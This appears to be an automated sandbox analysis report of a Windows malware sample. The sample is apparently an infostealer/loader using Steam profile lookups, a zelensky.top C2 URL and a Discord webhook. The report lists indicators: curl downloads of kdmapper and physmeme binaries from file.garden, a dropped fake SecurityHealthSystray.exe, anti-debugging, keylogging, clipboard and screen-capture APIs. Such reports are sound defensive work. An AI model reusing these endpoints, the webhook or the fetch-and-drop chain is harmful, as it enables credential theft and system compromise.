                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: zelensky.top
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: powershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                Source: powershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                Source: powershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                Source: powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: gh3zRWl4or.exeString found in binary or memory: http://www.houseindustries.com/license
                                Source: gh3zRWl4or.exeString found in binary or memory: http://www.houseindustries.com/licenseBurbank
                                Source: gh3zRWl4or.exeString found in binary or memory: http://www.houseindustries.com/licenseCopyright
                                Source: gh3zRWl4or.exeString found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
                                Source: powershell.exe, 0000001D.00000002.1814705608.000002AB18ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                Source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000032.00000002.2023378514.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000033.00000002.1970639828.0000000002AFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                                Source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top
                                Source: msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/
                                Source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
                                Source: powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: gh3zRWl4or.exeString found in binary or memory: https://auth.gg/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                                Source: powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: gh3zRWl4or.exeString found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
                                Source: curl.exe, 00000005.00000002.1348744210.0000025E1A760000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348353534.0000025E1A79A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
                                Source: curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$
                                Source: curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
                                Source: curl.exe, 00000005.00000002.1348744210.0000025E1A79B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348353534.0000025E1A79A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binJ
                                Source: curl.exe, 00000008.00000002.1365439765.000001D6FD250000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
                                Source: curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
                                Source: curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binDj
                                Source: curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binurlrc
                                Source: powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                Source: powershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1399217916.0000000001480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                Source: RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/i&
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                                Source: RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900A&
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65264
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 65264 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:65264 version: TLS 1.2
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674152A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,0_2_00007FF674152A90
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674152CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF674152CE0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674152A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,0_2_00007FF674152A90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,12_2_00438E3C
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67417B2C0 GetAsyncKeyState,exit,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF67417B2C0

                                System Summary

                                barindex
                                Source: physmeme.exe.8.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 360448
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174760
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174BD0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67418ADB0: memset,memset,DeviceIoControl,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,Concurrency::cancel_current_task,0_2_00007FF67418ADB0
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741743000_2_00007FF674174300
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741747600_2_00007FF674174760
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD00_2_00007FF674174BD0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67416A1600_2_00007FF67416A160
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741509600_2_00007FF674150960
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741585700_2_00007FF674158570
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67415C5500_2_00007FF67415C550
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674170D800_2_00007FF674170D80
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741659900_2_00007FF674165990
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674155DF00_2_00007FF674155DF0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741775C00_2_00007FF6741775C0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741665D00_2_00007FF6741665D0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741652200_2_00007FF674165220
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67416EA700_2_00007FF67416EA70
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674163A700_2_00007FF674163A70
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741592500_2_00007FF674159250
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674162E500_2_00007FF674162E50
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674150E800_2_00007FF674150E80
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67414E6800_2_00007FF67414E680
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741676800_2_00007FF674167680
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741616900_2_00007FF674161690
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67418DADC0_2_00007FF67418DADC
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67415A2F00_2_00007FF67415A2F0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67417B2C00_2_00007FF67417B2C0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67417A6D00_2_00007FF67417A6D0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674156ED00_2_00007FF674156ED0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674179B300_2_00007FF674179B30
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67417D7300_2_00007FF67417D730
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674172F100_2_00007FF674172F10
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674158BA00_2_00007FF674158BA0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741597A00_2_00007FF6741597A0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674160BA00_2_00007FF674160BA0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741548200_2_00007FF674154820
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67415A8000_2_00007FF67415A800
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67414B8750_2_00007FF67414B875
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67415D4700_2_00007FF67415D470
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67416F0400_2_00007FF67416F040
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67415A0400_2_00007FF67415A040
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67418C0B00_2_00007FF67418C0B0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67416E4B00_2_00007FF67416E4B0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67414F4800_2_00007FF67414F480
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF6741424F00_2_00007FF6741424F0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67415F8F00_2_00007FF67415F8F0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67417ECC00_2_00007FF67417ECC0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062848E6_2_0062848E
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006240FE6_2_006240FE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006300B76_2_006300B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006340886_2_00634088
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006371536_2_00637153
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006451C96_2_006451C9
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006232F76_2_006232F7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006362CA6_2_006362CA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006343BF6_2_006343BF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062F4616_2_0062F461
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0064D4406_2_0064D440
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062C4266_2_0062C426
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006377EF6_2_006377EF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062286B6_2_0062286B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0064D8EE6_2_0064D8EE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_006519F46_2_006519F4
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062E9B76_2_0062E9B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_00636CDC6_2_00636CDC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_00633E0B6_2_00633E0B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062EFE26_2_0062EFE2
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_00644F9A6_2_00644F9A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043804012_2_00438040
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042C07012_2_0042C070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044907012_2_00449070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040100012_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B0E012_2_0040B0E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040C08012_2_0040C080
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D15012_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004491F012_2_004491F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041F19312_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040924012_2_00409240
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042C24312_2_0042C243
